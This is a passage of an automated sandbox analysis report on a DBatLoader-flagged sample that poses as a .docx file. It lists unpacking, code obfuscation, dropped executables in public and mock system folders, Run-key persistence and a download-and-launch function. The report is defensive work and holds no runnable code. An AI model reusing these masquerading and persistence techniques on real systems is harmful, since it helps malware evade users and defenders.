Source:	Binary string: easinvoker.pdbH source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
Source:	Binary string: FodHelper.pdbGCTL source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\drbdmeyP.pif

Unpacked PE file: 3.2.drbdmeyP.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Unpacked PE file: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Binary contains a suspicious time stamp

Source: drbdmeyP.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_02997CC8

PE file contains sections with non-standard names

Source: alpha.exe.6.dr	Static PE information: section name: .didat
Source: per.exe.18.dr	Static PE information: section name: .imrsiv

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029832FC push eax; ret	0_2_02983338
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029AA2FC push 029AA367h; ret	0_2_029AA35F
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299D2E4 push ecx; mov dword ptr [esp], edx	0_2_0299D2E9
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298635A push 029863B7h; ret	0_2_029863AF
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298635C push 029863B7h; ret	0_2_029863AF
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029AA0AC push 029AA125h; ret	0_2_029AA11D
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029AA1F8 push 029AA288h; ret	0_2_029AA280
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029AA144 push 029AA1ECh; ret	0_2_029AA1E4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02986748 push 0298678Ah; ret	0_2_02986782
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02986746 push 0298678Ah; ret	0_2_02986782
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298C4FC push ecx; mov dword ptr [esp], edx	0_2_0298C501
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298D530 push 0298D55Ch; ret	0_2_0298D554
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298CB7C push 0298CD02h; ret	0_2_0298CCFA
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299789C push 02997919h; ret	0_2_02997911
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0298C8AA push 0298CD02h; ret	0_2_0298CCFA
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029968D8 push 02996983h; ret	0_2_0299697B
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029968D6 push 02996983h; ret	0_2_0299697B
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029A9874 push 029A9A60h; ret	0_2_029A9A58
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029ADE98 push eax; ret	0_2_029ADF68
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02999EBB push 02999EF4h; ret	0_2_02999EEC
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02999EBC push 02999EF4h; ret	0_2_02999EEC
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02992EF0 push 02992F66h; ret	0_2_02992F5E
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02995E0C push ecx; mov dword ptr [esp], edx	0_2_02995E0E
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02992FFB push 02993049h; ret	0_2_02993041
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02992FFC push 02993049h; ret	0_2_02993041
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997F18 push 02997F50h; ret	0_2_02997F48
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997C7C push 02997CBEh; ret	0_2_02997CB6
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00419935 push edx; iretd	3_2_00419949
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00419A3E push eax; ret	3_2_00419A41
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00414324 push cs; iretd	3_2_004143FA
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00414426 push cs; iretd	3_2_004143FA

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	File created: C:\Users\Public\Libraries\drbdmeyP.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Pyemdbrd.PIF			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows \System32\per.exe

Jump to behavior

Contains functionality to download and launch executables

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_04586EB0 ShellExecuteW,URLDownloadToFileW,

31_2_04586EB0

Drops PE files

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	File created: C:\Users\Public\Libraries\drbdmeyP.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Windows \System32\per.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Pyemdbrd.PIF	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Windows \System32\per.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

31_2_0459AA4A

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Pyemdbrd			Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Pyemdbrd			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.pif

Static PE information: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

0_2_02999EF8

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
